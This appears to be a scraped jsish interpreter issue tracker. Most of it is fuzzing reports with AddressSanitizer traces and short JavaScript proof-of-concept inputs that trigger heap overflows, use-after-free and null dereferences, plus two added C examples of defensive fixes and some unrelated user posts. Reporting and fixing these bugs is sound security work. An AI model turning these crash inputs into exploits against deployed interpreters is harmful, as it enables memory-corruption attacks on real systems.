Below is the ASAN outputs.

=================================================================
==2511==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60d00000ce56 at pc 0x0000004e8763 bp 0x7fff6dd3ff40 sp 0x7fff6dd3ff30
READ of size 1 at 0x60d00000ce56 thread T0
#0 0x4e8762 in jsi_utf_tocase src/jsiString.c:396
#1 0x4e951f in StringToLowerCaseCmd src/jsiString.c:432
#2 0x4c405d in jsi_FuncCallSub src/jsiProto.c:244
#3 0x73eaa4 in jsiFunctionSubCall src/jsiEval.c:790
#4 0x73eaa4 in jsiEvalFunction src/jsiEval.c:825
#5 0x73eaa4 in jsiEvalCodeSub src/jsiEval.c:1250
#6 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#7 0x4c517a in jsi_FuncCallSub src/jsiProto.c:220
#8 0x73e7ca in jsiFunctionSubCall src/jsiEval.c:790
#9 0x73e7ca in jsiEvalFunction src/jsiEval.c:825
#10 0x73e7ca in jsiEvalCodeSub src/jsiEval.c:1250
#11 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#12 0x4c517a in jsi_FuncCallSub src/jsiProto.c:220
#13 0x73e7ca in jsiFunctionSubCall src/jsiEval.c:790
#14 0x73e7ca in jsiEvalFunction src/jsiEval.c:825
#15 0x73e7ca in jsiEvalCodeSub src/jsiEval.c:1250
#16 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#17 0x75317f in jsi_evalStrFile src/jsiEval.c:2496
#18 0x499c46 in Jsi_Main src/jsiInterp.c:917
#19 0xc0345a in jsi_main src/main.c:44
#20 0x7f78c529883f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#21 0x434f48 in _start (/home/keven/Fuzzing/jsish-1024/jsish+0x434f48)

0x60d00000ce56 is located 0 bytes to the right of 134-byte region [0x60d00000cdd0,0x60d00000ce56)
allocated by thread T0 here:
#0 0x7f78c5e04602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x49e422 in Jsi_Malloc src/jsiUtils.c:52

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiString.c:396 jsi_utf_tocase
Shadow bytes around the buggy address:
0x0c1a7fff9970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff9980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff9990: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff99a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff99b0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
=>0x0c1a7fff99c0: 00 00 00 00 00 00 00 00 00 00[06]fa fa fa fa fa
0x0c1a7fff99d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1a7fff99e0: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 00 00
0x0c1a7fff99f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 fa
0x0c1a7fff9a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1a7fff9a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==2511==ABORTING

heap-use-after-free at Jsi_ObjFree src/jsiObj.c:333

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: 17c32ef
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

POC

jsish-1021-000005.txt

Description

Below is the ASAN outputs.

==62343==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000016968 at pc 0x00000057992e bp 0x7ffc089887e0 sp 0x7ffc089887d0
READ of size 4 at 0x608000016968 thread T0
#0 0x57992d in Jsi_ObjFree src/jsiObj.c:333
#1 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
#2 0x454cf1 in ValueFree src/jsiValue.c:178
#3 0x454cf1 in Jsi_ValueFree src/jsiValue.c:199
#4 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
#5 0x5774f7 in DeleteTreeValue src/jsiObj.c:171
#6 0x595fda in Jsi_TreeEntryDelete src/jsiTree.c:636
#7 0x59ee73 in destroy_node src/jsiTree.c:496
#8 0x59ee73 in Jsi_TreeDelete src/jsiTree.c:515
#9 0x579387 in Jsi_ObjFree src/jsiObj.c:342
#10 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
#11 0x454cf1 in ValueFree src/jsiValue.c:178
#12 0x454cf1 in Jsi_ValueFree src/jsiValue.c:199
#13 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
#14 0x524735 in Jsi_OptionsFree src/jsiOptions.c:1383
#15 0x48a1f3 in jsiInterpDelete src/jsiInterp.c:1904
#16 0xc07b3f in jsi_main src/main.c:46
#17 0x7f17635b783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#18 0x434fc8 in _start (/home/keven/Fuzzing/jsish-1021/jsish+0x434fc8)

0x608000016968 is located 72 bytes inside of 96-byte region [0x608000016920,0x608000016980)
freed by thread T0 here:
#0 0x7f17641232ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x478483 in regExpFree src/jsiInterp.c:585

previously allocated by thread T0 here:
#0 0x7f176412379a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x49f5a4 in Jsi_Calloc src/jsiUtils.c:57
#2 0xca03b7 (/home/keven/Fuzzing/jsish-1021/jsish+0xca03b7)

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:333 Jsi_ObjFree
Shadow bytes around the buggy address:
0x0c107fffacd0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107ffface0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffacf0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad00: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad10: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c107fffad20: fa fa fa fa fd fd fd fd fd fd fd fd fd[fd]fd fd
0x0c107fffad30: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c107fffad40: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad50: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad60: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffad70: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==62343==ABORTING

integer overflow

Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
o = o.toString(o.length);
var a = Object.keys(o);
var YzNz = new RegExp('kf}(Vq)XW8St');
o.length = -o.length;
o.length = 5e-324 >= 9007199254740992;
o.length = o == 1.3;
a.length = -9007199254740990;
o.length = a.length > o;
var FpXa = new RegExp('\fÇ\xAF\x8F\x93A\xAFuQ=ºC\x99e\xACCýæÜ47\x18');
var APSB = -9007199254740990 != a.length;
APSB = a.slice(a.length, a.length);
var ZDnB = a.map(function () {
}, function () {
});

The vulnerability code is in src/jsiArray.c:414, the function jsi_ArrayMapCmd; the vulnerable code is as follows:
[screenshot not captured]
The curlen here is also the size of the array, and it can be set arbitrarily in the JS code, for example in the poc:

[screenshot not captured]
The affected code is in the function Jsi_ObjSetLength, as shown in the figure:

[screenshot not captured]
The actual array size len is larger than obj->arrMaxSize, which triggers the assert.

Stack-overflow in (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5)

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
export CFLAGS='-fsanitize=address'
make
Test case
function JSEtest(Function) {
    var a = Array.prototype.push.call(a, 42, 43);
}
for (var i = 0; i < 25000; i++) {
    JSEtest(Array);
}

Execution steps & Output
$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
==9209==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd05e20e58 (pc 0x7f6abd3fb1e6 bp 0x7ffd05e216f0 sp 0x7ffd05e20e60 T0)
    #0 0x7f6abd3fb1e5  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5)
    #1 0x5571122680fd in Jsi_NameLookup src/jsiUtils.c:413
    #2 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
    #3 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
    #4 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
    #5 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
    #6 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
    #7 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
    #8 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
    #9 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
    ......					......					......
    ......					......					......
    #246 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
    #247 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
    #248 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119
    #249 0x5571122683cb in Jsi_NameLookup src/jsiUtils.c:466
    #250 0x557112211b51 in jsi_ValueSubscript src/jsiValue.c:1119

SUMMARY: AddressSanitizer: stack-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5b1e5)
==9209==ABORTING

Credits: Found by OWL337 team.
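
The trace above shows Jsi_NameLookup and jsi_ValueSubscript calling each other until the C stack is exhausted; the page does not establish why the chain never terminates. As an added example, not jsish's code, here is the general defence a chain-walking lookup needs so that a looped or absurdly long chain returns an error instead of overflowing: iterate rather than recurse, cap the depth, and detect cycles. `Obj`, `LOOKUP_MAX_DEPTH`, the `LookupRc` codes and the `demo_*` functions are assumptions for the example.

```c
#include <stddef.h>
#include <string.h>

/* Model of an object with one named property and a prototype link
 * (assumed shape for the example; not jsish's Jsi_Obj). */
typedef struct Obj {
    const char *key;       /* the one property this object owns, or NULL */
    int value;
    struct Obj *proto;
} Obj;

#define LOOKUP_MAX_DEPTH 1024

typedef enum { LK_FOUND = 0, LK_MISSING = -1, LK_TOO_DEEP = -2, LK_CYCLE = -3 } LookupRc;

/* The shape that overflows: recurse into the prototype with no bound.
 * Kept only for contrast; the demo never calls it on a cyclic chain. */
static LookupRc lookup_recursive(const Obj *o, const char *name, int *out) {
    if (!o) return LK_MISSING;
    if (o->key && strcmp(o->key, name) == 0) { *out = o->value; return LK_FOUND; }
    return lookup_recursive(o->proto, name, out);
}

/* Hardened: iterate instead of recurse, cap the depth, and detect a cycle
 * with a half-speed trailing pointer (Floyd), so a looped chain is reported
 * as such instead of being walked until the depth cap. */
static LookupRc lookup_guarded(const Obj *o, const char *name, int *out) {
    const Obj *slow = o;
    int depth = 0;
    for (const Obj *p = o; p; p = p->proto, depth++) {
        if (depth > 0 && p == slow) return LK_CYCLE;
        if (depth > LOOKUP_MAX_DEPTH) return LK_TOO_DEEP;
        if (p->key && strcmp(p->key, name) == 0) { *out = p->value; return LK_FOUND; }
        if (depth & 1) slow = slow->proto;   /* slow advances every second step */
    }
    return LK_MISSING;
}

/* Constructed loop a -> b -> c -> a: the guarded walk reports the cycle. */
static int demo_cycle_detected(void) {
    Obj a = {"x", 1, NULL}, b = {"y", 2, NULL}, c = {"z", 3, NULL};
    int v = 0;
    a.proto = &b; b.proto = &c; c.proto = &a;
    return lookup_guarded(&a, "missing", &v) == LK_CYCLE;
}

/* Ordinary chain: both versions find the property two links up. */
static int demo_found_through_chain(void) {
    Obj a = {"x", 1, NULL}, b = {"y", 2, NULL}, c = {"z", 3, NULL};
    int v = 0;
    a.proto = &b; b.proto = &c;
    return lookup_guarded(&a, "z", &v) == LK_FOUND && v == 3
        && lookup_recursive(&a, "z", &v) == LK_FOUND && v == 3;
}

/* Acyclic but longer than the cap: the guarded walk stops with LK_TOO_DEEP. */
static int demo_depth_cap(void) {
    static Obj chain[LOOKUP_MAX_DEPTH + 2];
    int v = 0;
    for (int i = 0; i < LOOKUP_MAX_DEPTH + 2; i++) {
        chain[i].key = NULL; chain[i].value = 0;
        chain[i].proto = (i + 1 < LOOKUP_MAX_DEPTH + 2) ? &chain[i + 1] : NULL;
    }
    return lookup_guarded(&chain[0], "missing", &v) == LK_TOO_DEEP;
}
```

In an interpreter the error codes would become a catchable RangeError-style exception; the point is that a script-constructed chain must never decide how deep the C stack goes.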

heap-use-after-free at jsi_ArrayReduceSubCmd src/jsiArray.c:620

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: 17c32ef
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

POC

jsish-1021-000002.txt

Description

Below is the ASAN outputs.

=================================================================
==75149==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000014048 at pc 0x0000004ff1ab bp 0x7ffc17dbe420 sp 0x7ffc17dbe410
READ of size 8 at 0x608000014048 thread T0
#0 0x4ff1aa in jsi_ArrayReduceSubCmd src/jsiArray.c:620
#1 0x4ff1aa in jsi_ArrayReduceRightCmd src/jsiArray.c:662
#2 0x4c4f20 in jsi_FuncCallSub src/jsiProto.c:244
#3 0x73e470 in jsiFunctionSubCall src/jsiEval.c:793
#4 0x73e470 in jsiEvalFunction src/jsiEval.c:828
#5 0x73e470 in jsiEvalCodeSub src/jsiEval.c:1253
#6 0x7509a7 in jsi_evalcode src/jsiEval.c:2188
#7 0x7534fb in jsi_evalStrFile src/jsiEval.c:2494
#8 0x49ae7e in Jsi_Main src/jsiInterp.c:917
#9 0xc07b32 in jsi_main src/main.c:44
#10 0x7f9608aca83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#11 0x434fc8 in _start (/home/keven/Fuzzing/jsish-1021/jsish+0x434fc8)

0x608000014048 is located 40 bytes inside of 96-byte region [0x608000014020,0x608000014080)
freed by thread T0 here:
#0 0x7f96096362ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434

previously allocated by thread T0 here:
#0 0x7f960963679a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x49f5a4 in Jsi_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiArray.c:620 jsi_ArrayReduceSubCmd
Shadow bytes around the buggy address:
0x0c107fffa7b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c107fffa7c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa7d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fffa7e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c107fffa7f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c107fffa800: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fd
0x0c107fffa810: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa820: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa830: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa840: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c107fffa850: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==75149==ABORTING

jsish.exe from website is an ELF binary

Hello Peter,

It is with mixed feelings that I see you on github. Did you abandon fossil? I saw fossil being used in an embedded project and it made me think of you.

I tried downloading the windows binary but it's an ELF binary:

russh@LAYNE MINGW64 ~
$ wget http://jsish.org/bin/jsish.exe
--2020-12-19 13:10:20--  http://jsish.org/bin/jsish.exe
Resolving jsish.org (jsish.org)... 50.116.0.90
Connecting to jsish.org (jsish.org)|50.116.0.90|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://jsish.org/download/jsish [following]
--2020-12-19 13:10:20--  http://jsish.org/download/jsish
Reusing existing connection to jsish.org:80.
HTTP request sent, awaiting response... 200 OK
Length: 9053045 (8.6M) [application/octet-stream]
Saving to: 'jsish.exe'

jsish.exe                     100%[=================================================>]   8.63M  2.93MB/s    in 2.9s

2020-12-19 13:10:23 (2.93 MB/s) - 'jsish.exe' saved [9053045/9053045]

russh@LAYNE MINGW64 ~
$ file jsish.exe
jsish.exe: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped

I was looking at JSI again because there has been a discussion on the new LuaForum.com site about Lua and JavaScript. A number of people have lamented the lack of embedded JS. I have obviously been directing them to your site. I am a moderator on the site and I invite you to create an account and write an article on JSI. I'd offer to do it but I'm neck deep in other projects.

Anyway, you might be amused to hear I've largely abandoned all other languages besides C and Lua in my personal time. I've been using C exclusively over the last 9 months at work too. I am creating a Windows-based llvm-mingw toolchain called WinLua. My work computer is KUbuntu and my primary IDE is Geany. Just picture me shaking my fist playfully at you. Is there any new technology tidbit you would like to elucidate me with before I waste more years fussing? Ha ha.

Hope you're well. Merry Christmas!

Null pointer dereference in url_encode

DongzhuoZhao added on 2020-05-11 05:31:25:
git version:
4603977

save follow testcase as .js format :

new Array(- 256, 0, - 2.0).forEach(encodeURI);

run:
./jsimin poc.js

Result:
zdz@ubuntu:~/jsish$ ./jsimin /home/zdz/debugBug/jsi/bug/poc.js
Segmentation fault (core dumped)

Backtrace:
(gdb) bt
#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:62
#1 0x00005555555b37d4 in Jsi_Strlen (str=0x0) at ./src/jsiChar.c:29
#2 0x00005555555cfdd2 in url_encode (str=0x0) at ./src/jsiCmds.c:1103
#3 0x00005555555d0062 in EncodeURICmd (interp=0x555555865260,
args=0x5555558c6b50, _this=0x5555558c6b90, ret=0x7fffffff5ba0,
funcPtr=0x55555588a510) at ./src/jsiCmds.c:1143
#4 0x000055555558f81a in jsi_FunctionInvoke (interp=0x555555865260,
tocall=0x5555558c67f0, args=0x5555558c6b50, ret=0x7fffffff5ba0,
_this=0x5555558c6a80) at ./src/jsiFunc.c:799
#5 0x000055555558f9b8 in Jsi_FunctionInvoke (interp=0x555555865260,
func=0x5555558c67f0, args=0x5555558c6b50, ret=0x7fffffff5ba0,
_this=0x5555558c6a80) at ./src/jsiFunc.c:823

Found by Dongzhuo Zhao working with ADLab of Venustech
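
The defect in this report is a builtin that assumes its argument is a string: forEach hands encodeURI a number, the string accessor returns NULL, and url_encode calls strlen(NULL). As an added example, not jsish's code, here is a percent-encoder that rejects NULL and a wrapper that applies ToString to its argument first. The `Value` type, `encode_uri_value` and the `demo_*` functions are assumptions for the example; `url_encode` shares only its name with the function in the backtrace.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Characters encodeURI leaves unescaped: ASCII alphanumerics plus the
 * ECMA-262 reserved and unescaped mark sets and '#'. */
static int uri_unescaped(unsigned char c) {
    return (c < 0x80 && isalnum(c)) ||
           (c != 0 && strchr(";,/?:@&=+$-_.!~*'()#", c) != NULL);
}

/* Percent-encode `s` into `out`. Returns the encoded length, or -1 if
 * `s` is NULL or the result does not fit. The NULL check is the guard the
 * report's url_encode lacked. */
static long url_encode(const char *s, char *out, size_t outsz) {
    static const char hex[] = "0123456789ABCDEF";
    size_t n = 0;
    if (!s || !out || outsz == 0) return -1;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (uri_unescaped(c)) {
            if (n + 1 >= outsz) return -1;
            out[n++] = (char)c;
        } else {
            if (n + 3 >= outsz) return -1;
            out[n++] = '%';
            out[n++] = hex[c >> 4];
            out[n++] = hex[c & 0x0F];
        }
    }
    out[n] = '\0';
    return (long)n;
}

/* Tiny tagged value standing in for the interpreter's argument type
 * (assumed for the example; not jsish's Jsi_Value). */
typedef enum { V_UNDEFINED, V_NUMBER, V_STRING } VType;
typedef struct { VType t; double num; const char *str; } Value;

/* What the builtin should do before touching a C string: apply ToString
 * to whatever it was handed instead of assuming a string argument.
 * Integral numbers render as JS would (-256 -> "-256", -2.0 -> "-2"). */
static long encode_uri_value(const Value *v, char *out, size_t outsz) {
    char tmp[64];
    const char *s;
    switch (v->t) {
    case V_STRING: s = v->str; break;
    case V_NUMBER: snprintf(tmp, sizeof tmp, "%.17g", v->num); s = tmp; break;
    default:       s = "undefined"; break;
    }
    return url_encode(s, out, outsz);
}

/* Demos return 1 when the output matches the expected encoding. */
static int demo_string(void) {
    char out[64];
    Value v = { V_STRING, 0, "a b/c?d=\xC3\xA9" };   /* constructed input, "é" as UTF-8 */
    return encode_uri_value(&v, out, sizeof out) == 16 &&
           strcmp(out, "a%20b/c?d=%C3%A9") == 0;
}

static int demo_number(void) {
    char out[64];
    Value v = { V_NUMBER, -256.0, NULL };            /* the PoC's first element */
    return encode_uri_value(&v, out, sizeof out) == 4 && strcmp(out, "-256") == 0;
}

static int demo_null_is_rejected(void) {
    char out[8];
    return url_encode(NULL, out, sizeof out) == -1;
}
```

Any builtin that can be passed as a callback (forEach, map, find, replace) will be invoked with whatever the array holds, so the coercion belongs in the builtin, not in its usual caller.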

Heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
export CFLAGS='-fsanitize=address'
make
Test case
assert(newObj.hasOwnProperty("prop")).throws(SyntaxError, function () {
    eval("'use strict'; function _13_0_7_fun() {eval = 42;};");
    _13_0_7_fun();
});

Execution steps & Output
$ ./jsish/jsish poc.js
=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028f8 at pc 0x55bcbd952990 bp 0x7ffd837e9530 sp 0x7ffd837e9520
READ of size 8 at 0x6250000028f8 thread T0
    #0 0x55bcbd95298f in jsiEvalCodeSub src/jsiEval.c:1366
    #1 0x55bcbd95c15e in jsi_evalcode src/jsiEval.c:2204
    #2 0x55bcbd960274 in jsi_evalStrFile src/jsiEval.c:2665
    #3 0x55bcbd64f66a in Jsi_Main src/jsiInterp.c:936
    #4 0x55bcbde5403a in jsi_main src/main.c:47
    #5 0x7f3599d46bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #6 0x55bcbd5e3969 in _start (/usr/local/bin/jsish+0xe8969)

0x6250000028f8 is located 8 bytes to the left of 8192-byte region [0x625000002900,0x625000004900)
allocated by thread T0 here:
    #0 0x7f359a9b5f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x55bcbd654972 in Jsi_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub
Shadow bytes around the buggy address:
  0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
  0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
========ABORTING

Credits: Found by OWL337 team.

Github?

Is the home of this project ever going to be Github, or always sourceforge?

heap-buffer-overflow at jsi_utf_tocase src/jsiString.c:396

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: c95c897
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

Target device:

Desktop Linux

POC

jsish-1021-000094.txt

Description

Below is the ASAN outputs.

=================================================================
==111446==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000c2f2 at pc 0x0000004cb802 bp 0x7ffe11e8b650 sp 0x7ffe11e8b640
READ of size 1 at 0x60200000c2f2 thread T0
#0 0x4cb801 in jsi_utf_tocase src/jsiString.c:396
#1 0x4cc578 in StringToLowerCaseCmd src/jsiString.c:428
#2 0x4a82f8 in jsi_FuncCallSub src/jsiProto.c:244
#3 0x72059a in jsiFunctionSubCall src/jsiEval.c:790
#4 0x72059a in jsiEvalFunction src/jsiEval.c:825
#5 0x72059a in jsiEvalCodeSub src/jsiEval.c:1250
#6 0x73335f in jsi_evalcode src/jsiEval.c:2190
#7 0x4a93bd in jsi_FuncCallSub src/jsiProto.c:220
#8 0x720371 in jsiFunctionSubCall src/jsiEval.c:790
#9 0x720371 in jsiEvalFunction src/jsiEval.c:825
#10 0x720371 in jsiEvalCodeSub src/jsiEval.c:1250
#11 0x73335f in jsi_evalcode src/jsiEval.c:2190
#12 0x4a93bd in jsi_FuncCallSub src/jsiProto.c:220
#13 0x720371 in jsiFunctionSubCall src/jsiEval.c:790
#14 0x720371 in jsiEvalFunction src/jsiEval.c:825
#15 0x720371 in jsiEvalCodeSub src/jsiEval.c:1250
#16 0x73335f in jsi_evalcode src/jsiEval.c:2190
#17 0x736037 in jsi_evalStrFile src/jsiEval.c:2496
#18 0x47e0ee in Jsi_Main src/jsiInterp.c:917
#19 0x90be3e in jsi_main src/main.c:44
#20 0x7f09e6f8b83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#21 0x418238 in _start (/home/keven/Fuzzing/jsish-1023/jsish+0x418238)

0x60200000c2f2 is located 0 bytes to the right of 2-byte region [0x60200000c2f0,0x60200000c2f2)
allocated by thread T0 here:
#0 0x7f09e7af7602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x4825c2 in Jsi_Malloc src/jsiUtils.c:52

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiString.c:396 jsi_utf_tocase
Shadow bytes around the buggy address:
0x0c047fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[02]fa
0x0c047fff9860: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa
0x0c047fff9870: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fa
0x0c047fff9880: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9890: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff98a0: fa fa 00 00 fa fa 04 fa fa fa 04 fa fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==111446==ABORTING

Native win32 build

